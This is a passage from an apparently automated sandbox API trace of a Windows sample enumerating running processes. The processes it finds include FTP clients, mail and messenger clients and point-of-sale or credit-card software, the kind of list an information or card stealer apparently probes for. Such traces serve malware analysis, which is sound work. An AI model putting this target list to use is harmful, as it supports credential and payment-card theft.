cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0188.958] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.986] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.988] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.989] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.991] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.992] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.994] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.997] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0189.000] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0189.002] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.004] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0189.006] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.008] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0189.010] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0189.012] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0189.014] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0189.016] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0189.019] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0189.020] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.021] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0189.064] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0189.067] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0189.069] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.072] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0189.074] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0189.077] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0189.079] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0189.081] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0189.083] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0189.085] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0189.087] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0189.089] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0189.091] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0189.093] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0189.095] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0189.165] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0189.168] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0189.170] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0189.172] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0189.174] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0189.177] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0189.179] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0189.181] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0189.183] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0189.187] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0189.190] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0189.193] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0189.196] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0189.199] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0189.201] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0189.257] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0189.259] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0189.267] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0189.270] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0189.273] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0189.276] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0189.279] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0189.282] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0189.285] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0189.287] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0189.290] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0189.293] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0189.296] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0189.304] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0189.307] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0189.310] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0189.313] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0189.316] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0189.318] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0189.321] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0189.324] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0189.327] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0189.329] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0189.332] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0189.361] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0189.369] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0189.372] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0189.375] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0189.378] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0189.381] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0189.383] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0189.387] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0189.389] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0189.392] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, 